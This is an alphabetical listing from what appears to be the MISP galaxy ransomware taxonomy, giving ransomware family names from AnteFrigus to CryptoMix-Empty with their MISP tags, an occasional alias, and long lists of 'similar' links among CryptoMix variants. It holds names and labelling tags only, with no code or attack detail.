AnteFrigus

Ransomware

The tag is: misp-galaxy:ransomware="AnteFrigus"

Anti-DDos

Ransomware

The tag is: misp-galaxy:ransomware="Anti-DDos"

Antihacker2017

Ransomware

The tag is: misp-galaxy:ransomware="Antihacker2017"

Anubi NotBTCWare

Ransomware

The tag is: misp-galaxy:ransomware="Anubi NotBTCWare"

Apocalypse-Missing

Ransomware

The tag is: misp-galaxy:ransomware="Apocalypse-Missing"

ApolloLocker

Ransomware

The tag is: misp-galaxy:ransomware="ApolloLocker"

Argus

Ransomware

The tag is: misp-galaxy:ransomware="Argus"

Armage

Ransomware

The tag is: misp-galaxy:ransomware="Armage"

Armageddon

Ransomware

The tag is: misp-galaxy:ransomware="Armageddon"

ArmaLocky

Ransomware

The tag is: misp-galaxy:ransomware="ArmaLocky"

Arsium

Ransomware

The tag is: misp-galaxy:ransomware="Arsium"

Assembly

Ransomware

The tag is: misp-galaxy:ransomware="Assembly"

Ataware

Ransomware

The tag is: misp-galaxy:ransomware="Ataware"

Atchbo

Ransomware

The tag is: misp-galaxy:ransomware="Atchbo"

ATLAS

Ransomware

The tag is: misp-galaxy:ransomware="ATLAS"

Australian-AES

Ransomware

The tag is: misp-galaxy:ransomware="Australian-AES"

AutoEncryptor

Ransomware

The tag is: misp-galaxy:ransomware="AutoEncryptor"

AutoWannaCryV2

Ransomware

The tag is: misp-galaxy:ransomware="AutoWannaCryV2"

Auuahk-Ouuohk

Ransomware

The tag is: misp-galaxy:ransomware="Auuahk-Ouuohk"

AVCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AVCrypt"

AxCrypter

Ransomware

The tag is: misp-galaxy:ransomware="AxCrypter"

aZaZeL

Ransomware

The tag is: misp-galaxy:ransomware="aZaZeL"

BadEncript

Ransomware

The tag is: misp-galaxy:ransomware="BadEncript"

Balbaz

Ransomware

The tag is: misp-galaxy:ransomware="Balbaz"

Baliluware

Ransomware

The tag is: misp-galaxy:ransomware="Baliluware"

Bam!

Ransomware

The tag is: misp-galaxy:ransomware="Bam!"

BananaCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BananaCrypt"

BancoCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BancoCrypt HT"

Barack Obama’s EBBV

Ransomware

The tag is: misp-galaxy:ransomware="Barack Obama’s EBBV"

Basilisque Locker

Ransomware

The tag is: misp-galaxy:ransomware="Basilisque Locker"

BASS-FES

Ransomware

The tag is: misp-galaxy:ransomware="BASS-FES"

BB

Ransomware

The tag is: misp-galaxy:ransomware="BB"

BeethoveN

Ransomware

The tag is: misp-galaxy:ransomware="BeethoveN"

BestChangeRu

Ransomware

The tag is: misp-galaxy:ransomware="BestChangeRu"

BigBossHorse

Ransomware

The tag is: misp-galaxy:ransomware="BigBossHorse"

Birbware

Ransomware

The tag is: misp-galaxy:ransomware="Birbware"

BitCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt"

BitCrypt 2.0

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt 2.0"

BitKangoroo

Ransomware

The tag is: misp-galaxy:ransomware="BitKangoroo"

BitPyLock

Ransomware

The tag is: misp-galaxy:ransomware="BitPyLock"

Bitshifter

Ransomware

The tag is: misp-galaxy:ransomware="Bitshifter"

BKRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BKRansomware"

Black Feather

Ransomware

The tag is: misp-galaxy:ransomware="Black Feather"

BlackFireEye

Ransomware

The tag is: misp-galaxy:ransomware="BlackFireEye"

BlackHat-Mehtihack

Ransomware

The tag is: misp-galaxy:ransomware="BlackHat-Mehtihack"

BlackKingdom

Ransomware

The tag is: misp-galaxy:ransomware="BlackKingdom"

BlackMist

Ransomware

The tag is: misp-galaxy:ransomware="BlackMist"

Blackout

Ransomware

The tag is: misp-galaxy:ransomware="Blackout"

BlackPink

Ransomware

The tag is: misp-galaxy:ransomware="BlackPink"

BlackRose

Ransomware

The tag is: misp-galaxy:ransomware="BlackRose"

BlackSheep

Ransomware

The tag is: misp-galaxy:ransomware="BlackSheep"

Black Worm

Ransomware

The tag is: misp-galaxy:ransomware="Black Worm"

Blank

Ransomware

The tag is: misp-galaxy:ransomware="Blank"

Blind

Ransomware

The tag is: misp-galaxy:ransomware="Blind"

Blitzkrieg

Ransomware

The tag is: misp-galaxy:ransomware="Blitzkrieg"

BlockFile12

Ransomware

The tag is: misp-galaxy:ransomware="BlockFile12"

BloodJaws

Ransomware

The tag is: misp-galaxy:ransomware="BloodJaws"

Blooper

Ransomware

The tag is: misp-galaxy:ransomware="Blooper"

BlueCheeser

Ransomware

The tag is: misp-galaxy:ransomware="BlueCheeser"

Bluerose

Ransomware

The tag is: misp-galaxy:ransomware="Bluerose"

BOK

Ransomware

The tag is: misp-galaxy:ransomware="BOK"

BoooamCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BoooamCrypt"

BooM

Ransomware

The tag is: misp-galaxy:ransomware="BooM"

Boris HT

Ransomware

The tag is: misp-galaxy:ransomware="Boris HT"

BrainLag

Ransomware

The tag is: misp-galaxy:ransomware="BrainLag"

BRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BRansomware"

Brick

Ransomware

The tag is: misp-galaxy:ransomware="Brick"

BrickR

Ransomware

The tag is: misp-galaxy:ransomware="BrickR"

BtcKING

Ransomware

The tag is: misp-galaxy:ransomware="BtcKING"

BTCWare-Aleta

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Aleta"

BTCWare-Gryphon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Gryphon"

BTCWare-Master

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Master"

BTCWare-Nuclear

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Nuclear"

BTCWare-Onyon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Onyon"

BTCWare-PayDay

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-PayDay"

BTCWare-Wyvern

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Wyvern"

Bud

Ransomware

The tag is: misp-galaxy:ransomware="Bud"

BugWare

Ransomware

The tag is: misp-galaxy:ransomware="BugWare"

BulbaCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BulbaCrypt HT"

BWall

Ransomware

The tag is: misp-galaxy:ransomware="BWall"

C0hen Locker

Ransomware

The tag is: misp-galaxy:ransomware="C0hen Locker"

CA$HOUT

Ransomware

The tag is: misp-galaxy:ransomware="CA$HOUT"

CainXPii

Ransomware

The tag is: misp-galaxy:ransomware="CainXPii"

Cephalo

Ransomware

The tag is: misp-galaxy:ransomware="Cephalo"

Cerberos

Ransomware

The tag is: misp-galaxy:ransomware="Cerberos"

Charmant

Ransomware

The tag is: misp-galaxy:ransomware="Charmant"

Chekyshka

Ransomware

The tag is: misp-galaxy:ransomware="Chekyshka"

ChernoLocker

Ransomware

The tag is: misp-galaxy:ransomware="ChernoLocker"

ChinaYunLong

Ransomware

The tag is: misp-galaxy:ransomware="ChinaYunLong"

Christmas

Ransomware

The tag is: misp-galaxy:ransomware="Christmas"

ClicoCrypter

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter"

ClicoCrypter-2

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter-2"

Clouded

Ransomware

The tag is: misp-galaxy:ransomware="Clouded"

Cmd

Ransomware

The tag is: misp-galaxy:ransomware="Cmd"

Codemanager

Ransomware

The tag is: misp-galaxy:ransomware="Codemanager"

Coin Locker

Ransomware

The tag is: misp-galaxy:ransomware="Coin Locker"

Comrade HT

Ransomware

The tag is: misp-galaxy:ransomware="Comrade HT"

CoNFicker

Ransomware

The tag is: misp-galaxy:ransomware="CoNFicker"

Coom

Ransomware

The tag is: misp-galaxy:ransomware="Coom"

CorruptCrypt

Ransomware

The tag is: misp-galaxy:ransomware="CorruptCrypt"

Creeper

Ransomware

The tag is: misp-galaxy:ransomware="Creeper"

Creepy

Ransomware

The tag is: misp-galaxy:ransomware="Creepy"

Cripton

Ransomware

The tag is: misp-galaxy:ransomware="Cripton"

Cripton7zp

Ransomware

The tag is: misp-galaxy:ransomware="Cripton7zp"

Cry36

Ransomware

The tag is: misp-galaxy:ransomware="Cry36"

Cry9

Ransomware

The tag is: misp-galaxy:ransomware="Cry9"

CryCipher

Ransomware

The tag is: misp-galaxy:ransomware="CryCipher"

CryCipher is also known as:

  • PayPalGenerator2019

CryForMe

Ransomware

The tag is: misp-galaxy:ransomware="CryForMe"

Crying

Ransomware

The tag is: misp-galaxy:ransomware="Crying"

CryMore

Ransomware

The tag is: misp-galaxy:ransomware="CryMore"

Cryp70n1c

Ransomware

The tag is: misp-galaxy:ransomware="Cryp70n1c"

Crypt0 HT

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0 HT"

Crypt0

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0"

Crypt0L0cker

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0L0cker"

Crypt0r

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0r"

Crypt12

Ransomware

The tag is: misp-galaxy:ransomware="Crypt12"

CryptFuck

Ransomware

The tag is: misp-galaxy:ransomware="CryptFuck"

CryptGh0st

Ransomware

The tag is: misp-galaxy:ransomware="CryptGh0st"

Crypto_Lab

Ransomware

The tag is: misp-galaxy:ransomware="Crypto_Lab"

CryptoApp

Ransomware

The tag is: misp-galaxy:ransomware="CryptoApp"

Crypto-Blocker

Ransomware

The tag is: misp-galaxy:ransomware="Crypto-Blocker"

CryptoBoss

Ransomware

The tag is: misp-galaxy:ransomware="CryptoBoss"

CryptoCat

Ransomware

The tag is: misp-galaxy:ransomware="CryptoCat"

CryptoClone

Ransomware

The tag is: misp-galaxy:ransomware="CryptoClone"

CryptoDark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoDark"

CryptoGod 2017

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2017"

CryptoGod 2018

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2018"

CryptoLite

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLite"

CryptolockerEmulator

Ransomware

The tag is: misp-galaxy:ransomware="CryptolockerEmulator"

CryptoLockerEU 2016

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLockerEU 2016"

CryptoManiac

Ransomware

The tag is: misp-galaxy:ransomware="CryptoManiac"

CryptoMix-0000

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-0000"

CryptoMix-0000 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Arena

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Arena"

CryptoMix-Arena has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Azer

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Azer"

CryptoMix-Azer has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Backup

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Backup"

CryptoMix-Backup has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-CK

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-CK"

CryptoMix-CK has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Coban

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Coban"

CryptoMix-Coban has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-DLL

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-DLL"

CryptoMix-DLL has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Empty

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Empty"

CryptoMix-Empty has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

